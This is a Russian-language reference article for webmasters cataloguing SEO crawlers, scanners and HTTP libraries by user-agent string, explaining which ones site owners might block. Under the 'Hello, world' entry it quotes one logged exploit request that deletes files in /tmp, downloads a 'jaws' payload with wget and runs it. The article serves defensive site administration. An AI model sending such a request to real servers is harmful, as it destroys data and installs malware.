В статье переставлен список плохих ботов и краулеров, с их описанием для понимания каких ботов можно блокировать.
В статье описаны различные боты, это не означает что их стоит незамедлительно блокировать, цель статьи дать понимание для чего служит той или иной бот.
Статья периодически обновляется.
Важный момент, все SEO боты могут быть полезны, лишь в том случае, если вы являетесь клиентом данной компании, во всех остальных случаях, данные, пол
Как блокировать ботов
Список "плохих" ботов
BLEXBot
SEO бот, собирает данные для сайтов для продажи своим клиентам. Вначале может делать несколько запросов к сайту, но в какой-то момент не может умерить свой аппетит и начинает создавать значительную нагрузку на сайт.
Если вы не являетесь клиентом webmeup, рекомендуется его заблокировать.
1 | Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/) |
Semrush
Еще один SEO бот, так же может создавать значительную нагрузку на сайт.
1 | Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) |
Бот инструмента Backlink Audit
1 | Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html) |
DataForSeoBot
SEO бот сервиса DataForSeo. Основная задача: Анализ обратных ссылок.
1 | Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot) |
Moz
SEO бот компании Moz, если не используете их API, то скорее всего этот бот вам так же не нужен.
1 |
AhrefsBot
SEO бот компании Ahfers, используется для сбора аналитики по сайтам.
1 | Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) |
PetalBot
PetalBot - это бот поисковой системы "Petal Search" от компании Huawei. Является "вежливым ботом" и периодически запрашивает файл "/robots.txt" для того, чтобы следовать указаниям вебмастера. Это бот, как и многие другие индексирующие роботы поисковых систем, запрашивает страницы сайта и изображения.
Создает незначительную нагрузку на сайт, блокировать стоит если не заинтересованы в поисковой системе Petal Search.
1 | Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) |
Barkrowler
Barkrowler - это бот компании eXenSa, компания занимается машинным обучением и анализом текстовых данных.
Может создавать сотни или больше запросов к сайту.
1 | Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler) |
MJ12bot
Бот SEO аналитики компании Majestic. Рекомендуется к блокировке. Если появился, то будет создавать значительную нагрузку на сайт.
1 | Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/) |
Serendeputy
Бот собирающий страницы в новостную ленту serendeputy.com.
1 | SerendeputyBot/0.8.6 (http://serendeputy.com/about/serendeputy-bot) |
netEstate NE Crawler
Сканер немецкой компании, специализирующейся на краулерах, поисковых системах и семантических веб-технологиях. Другими словами, очередной SEO бот. После попадания на сайт начинает без меры сканировать все страницы, создавая нагрузку.
1 | netEstate NE Crawler (+http://www.website-datenbank.de/) |
SeopultContentAnalyzer
Очередной SEO бот, от компании PromoPult (бывш. SeoPult). Если не являетесь их клиентами, то лучше блокировать.
1 | SeopultContentAnalyzer/1.0 |
CCBot
Бот собирает различную информацию с веб-страниц, для передачи исследователям. Трафика от него не будет как и пользы. При это не создает какую либо нагрузку, выполняет несколько запросов в минуту.
1 | CCBot/2.0 (https://commoncrawl.org/faq/) |
MegaIndex
SEO бот, от компании MegaIndex. Если не являетесь их клиентами, то лучше блокировать. При "обнаружении" сайта довольно активно начинает сканировать страницы, создавая дополнительную нагрузку.
1 | Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler) |
Serpstatbot
SEO бот собирающий и отслеживающий ссылки в Интернет, используется для маркетинга.
1 |
ZoominfoBot
ZoomInfo - это платформа для сбора информации о рынке для команд продаж и маркетинга B2B. Интегрированная облачная платформа предоставляет продавцам и маркетологам информацию, которая помогает им находить потенциальных новых клиентов.
1 | ZoominfoBot (zoominfobot at zoominfo dot com) |
Linkfluence
Linkfluence занимается анализом данных в социальных медиа. Компания специализируется на европейском рынке и предлагает готовую систему для сбора и анализа данных. Linkfluence позиционирует себя как готовое решение для получения Actionable Insight. Семейство Linkfluence содержит два продукта – это Radarly и Search. Первый из них помогает обнаруживать упоминание вашего бренда в сети, в том числе за счет распознавания логотипов, а Linkfluence Search позволяет сравнивать ROI и эффективность ваших кампаний, сравнивать свои результаты с конкурентными брендами и находить “горячие” тренды в социальных медиа.
1 |
NetcraftSurveyAgent
Netcraft предоставляет услуги по обеспечению интернет-безопасности , включая обнаружение и пресечение киберпреступлений, тестирование приложений и сканирование PCI.
Бот может игнорировать настройки robots.txt и создавать значительную нагрузку на сайт.
1 | Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) |
weborama
Инструментарий digital-рекламы, занимается анализом данных об интернет-аудитории. Если не являетесь их клиентами, то лучше блокировать, трафика он Вам точно не принесет.
1 | weborama-fetcher (+http://www.weborama.com) |
SeekportBot
Похоже, что оригинальная поисковая система SeekPort обанкротилась, и домен приобрела SEO-компания. Этот бот ползает с нелепо высокой скоростью в течение нескольких часов подряд, в конечном итоге вызывая перегрузку сервера на некоторое время.
1 | Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com) |
SEOkicks
Краулер SEOkicks ищет на сайтах внешние ссылки на другие домены и записывает их, включая текст ссылки и атрибуты ссылки, в базу данных. Через веб-сайт SEOkicks операторы сайтов имеют возможность конкретно запрашивать, с каких сайтов интернет-страница получает ссылки. Если не являетесь их клиентом, то лучше блокировать.
1 | Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html) |
AwarioBot
AwarioSmartBot и AwarioRssBot - это веб-краулеры, отправленные компанией Awario для обнаружения и сбора новых и обновленных веб-данных (которые в дальнейшем используются интернет-маркетологами со всего мира).
1 2 3 4 | Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html) |
Keys.so
Сервис анализа конкурентов в SEO и PPC keys.so. Если не являетесь их клиентом, то лучше блокировать.
1 | Mozilla/5.0 (keys-so-bot) |
GetIntent Crawler
Бот компании GetIntent. Собирает данные о сайтах для маркетинговых целей, например, для анализа перспектив размещения контекстной рекламы.
1 | GetIntent Crawler (http://getintent.com/bot.html) |
Bytedance
"Любит" создавать избыточную нагрузку на сайты, расходую ресурсы и трафик.
Компания ByteDance Ltd. (китайский: 字节跳动; пиньинь: Zìjié Tiàodòng) - китайская компания в сфере интернет-технологий со штаб-квартирой в Пекине и зарегистрированная на Каймановых островах. Основанная Чжаном Имином, Ляном Рубо и группой других сотрудников в 2012 году, ByteDance разработала социальные сети и приложения для обмена видео TikTok и китайский аналог Douyin. Компания также является разработчиком новостной платформы Toutiao.
1 | Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36 |
Языки программирования
Go-http-client
Стандартный User-Agent языка GO. Встречался при попытке поиска уязвимостей, сканирование сайта и краулинга страниц.
1 2 | Go-http-client/1.1 Go-http-client/2.0 |
go-resty
Простая библиотека HTTP и REST клиентов для Go (вдохновленная Ruby rest-client).
1 | go-resty/2.14.0 (https://github.com/go-resty/resty) |
node-fetch
Легкий модуль, который привносит Fetch API в Node.js.
1 2 | node-fetch node-fetch/1.0 (+https://github.com/bitinn/node-fetch) |
okhttp
OkHttp - библиотека и HTTP‑клиент с открытым исходным кодом для Java и Kotlin.
1 2 3 4 5 6 | okhttp/3.14.7 okhttp/3.14.9 okhttp/3.2.0 okhttp/4.11.0 okhttp/4.12.0 okhttp/4.9.3 |
Apache-HttpClient
Apache-HttpClient - стандартный User-Agent библиотеки Apache HttpComponents Client. Написан на Java. Так же встречался при попытке поиска уязвимостей.
1 | Apache-HttpClient/4.5.2 (Java/1.8.0_151) |
axios
Axios - это HTTP-клиент, основанный на Promise для node.js.
1 2 3 4 5 6 7 8 9 | axios/0.21.1 axios/0.21.4 axios/1.4.0 axios/1.6.5 axios/1.6.8 axios/1.7.2 axios/1.7.3 axios/1.7.4 axios/1.7.5 |
Scrapy
Платформа с открытым исходным кодом для извлечения данных с веб-сайтов. Другими словами это библиотека Python для получения данных с сайтов.
1 | Scrapy/2.6.1 (+https://scrapy.org) |
python-requests
Requests — это модуль для языка Python, который используют для упрощения работы с HTTP-запросами.
1 2 3 4 5 6 7 8 9 10 11 | python-requests/2.20.0 python-requests/2.22.0 python-requests/2.25.1 python-requests/2.26.0 python-requests/2.27.1 python-requests/2.28.0 python-requests/2.28.1 python-requests/2.30.0 python-requests/2.31.0 python-requests/2.32.2 python-requests/2.32.3 |
fasthttp
fasthttp - Быстрый HTTP-пакет для Go. Настроен на высокую производительность.
1 | fasthttp |
Прочие боты
Nmap
Nmap (Network Mapper) - это инструмент с открытым исходным кодом для исследования сети и аудита безопасности.
Стоит обратить внимание на данные запросы, они могу происходить как в автоматическим режиме, различными исследователями, так и с целью взлома сервера.
1 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
BuiltWith
Система BuiltWith посещает веб-сайт, чтобы определить используемый на нем технологический профиль, просматривая общедоступный код веб-сайта.
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 11535acca8) Chrome/84.0.4147.105 Safari/537.36 |
Riddler
Riddler - это онлайновый исследовательский проект, который изучает алгоритмы отображения топологии Интернета. Riddler собирает данные об общедоступных системах посредством краулинга и картирования общих портов.
1 | Riddler (http://riddler.io/about) |
Screaming Frog SEO Spider
Screaming Frog SEO Spider - это SEO краулер веб-сайтов, извлекая данные и проводя аудит на предмет распространенных проблем SEO. Если вы не пользуетесь данным инструментом, лучше его заблокировать.
1 2 | Screaming Frog SEO Spider/15.1 Screaming Frog SEO Spider/16.7 |
PR-CY.RU
SEO бот от PR CY. Используется для комплексного анализа сайта, если не являетесь их клиентом, то лучше блокировать.
Не создает нагрузку на сайт, так как работает по запросу.
1 | Mozilla/5.0 (compatible; PR-CY.RU; + https://a.pr-cy.ru) |
wp_is_mobile
wp_is_mobile - бот прикидывающийся функцией WordPress для проверки является ли клиент мобильным устройством. "Используется" для поиска уязвимостей на сайте.
1 | wp_is_mobile |
ALittle Client
ALittle Client - Бот проверяет наличие файлов, обычно связанного с компрометацией (взломом) сайта.
1 | ALittle Client |
Linux Mozilla
Бот проверяет наличие файлов, обычно связанного с компрометацией (взломом) сайта.
1 | Linux Mozilla |
paloaltonetworks
Сканер американской компании Palo Alto Networks, Inc, занимающейся информационной безопасностью. Сканирует весь интернет, заходит обычно один раз в сутки. Можно заблокировать или написать письмо, в целом погоды это не сделает.
1 | Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: [email protected] |
BackupLand
Иногда заходит, примерно раз в сутки. Сканирует сайты на вирусы. Если не являетесь клиентом BackupLand особой пользы от него не будет.
1 | Mozilla/5.0 (compatible; BackupLand/1.0; https://go.backupland.com/; Domain check for viruses;) |
"Hello, world"
User-Agent по умолчанию, используемых в различных экплойтах, обычно используемых Скрипт-кидди без изменений.
Скрипт-кидди (англ. Script kiddie) — в хакерской культуре пейоративное название тех, кто пользуется скриптами или программами, разработанными другими, для атаки компьютерных систем и сетей, не понимая механизма их действия.
1 | Hello, world |
Пример запроса:
1 | GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 301 344 "-" "Hello, world" |
Nuclei
Сканер Nuclei используется для отправки запросов по целям на основе шаблона. Nuclei сканирует различные протоколов, включая TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless и др. Благодаря мощному и гибкому шаблонированию, Nuclei может быть использован для моделирования всех видов проверок безопасности.
1 | Nuclei - Open-source project (github.com/projectdiscovery/nuclei) |
WellKnownBot
Well-Known - это бесплатный, открытый индекс известных ресурсов (Well-Known). Он сканирует миллионы доменов с регулярными интервалами, составляя базу данных структурированных данных известных ресурсов, доступную для поиска.
WellKnownBot выполняет автоматические запросы, он не является веб-краулером/пауком. Он запрашивает только небольшое количество определенных ресурсов, предназначенных для публичного, программного потребления. Поскольку WellKnownBot не является краулером, он не следует общим правилам User-Agent: * правила краулинга в файлах robots.txt.
Не создает нагрузку на сайт, но периодически создает ошибки 404.
1 | Mozilla/5.0 (compatible; WellKnownBot/0.1; +https://well-known.dev/about/#bot) |
KOCMOHABT
Поисковый бот имеет небольшой индекс из почти 5 миллионов сайтов. Полезен при поиски информации по определенному сайту (проекту), Kozmonavt работает хорошо (при условии, что в его индекс попал этот сайт). Для обучения и поиска общей информации он работает плохо. По нему нет контактной информации, политики конфиденциальности или любой другой информации о тех, кто его создал.
Трафика не принесет, можно смело блокировать.
1 2 | KOCMOHABT (https://kozmonavt.ml/) Mozilla/5.0 (Web Explorer) KOCMOHABT (+https://kozmonavt.tk/) Mozilla/5.0 (compatible; Web Explorer 2) |
AcademicBotRTU
AcademicBotRTU - это веб-краулер, разработанный для индексации веб-сайтов и документов, по которым можно сравнивать и сопоставлять академические работы студентов и исследователей, чтобы помочь образовательным и научным учреждениям находить и предотвращать плагиат. Бот разработан и работает в Институте прикладных компьютерных систем Рижского технического университета.
Антиплагиат бот, пользы точно не будет.
1 |
Statdom
Проект "Домены России" использует ряд программно-аппаратных решений (роботов, ботов, "пауков") для сбора данных об инфраструктуре российских и международных сегментов Интернета.
1 | Mozilla/5.0 (compatible; statdom.ru/Bot-v6; +https://statdom.ru/bot.html) |
Turnitin
Этот робот собирает контент из Интернета с целью - помочь учебным заведениям предотвратить плагиат. Сравнивая студенческие работы с контентом, найденным в Интернете, чтобы найти сходство.
1 | Turnitin (https://bit.ly/2UvnfoQ) |
Amazonbot
Amazonbot - это веб-краулер Amazon, используемый для улучшения сервисов Amazon, например, для того, чтобы Alexa могла отвечать вопросы. В целом абсолютно бесполезен, врядли принесет трафик.
1 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML\, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) |